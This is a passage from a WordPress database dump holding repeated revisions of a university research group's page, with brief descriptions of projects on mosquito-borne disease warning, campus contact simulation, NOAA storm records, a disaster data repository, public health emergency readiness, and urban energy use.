data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">The DICE Data Repository </h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \r\n <br>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Orpheus</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:18:03','2023-09-29 14:18:03','',126,'https://gsudice.dataconn.net/?p=1424',0,'revision','',0),(1425,1,'2023-09-29 10:18:14','2023-09-29 14:18:14','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">The DICE Data Repository </h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \r\n <br>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Orpheus</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Publications','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:18:14','2023-09-29 14:18:14','',126,'https://gsudice.dataconn.net/?p=1425',0,'revision','',0),(1426,1,'2023-09-29 11:36:36','2023-09-29 14:19:10',' ','','','publish','closed','closed','','1426','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/?p=1426',2,'nav_menu_item','',0),(1427,1,'2023-09-29 10:19:53','2023-09-29 14:19:53','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 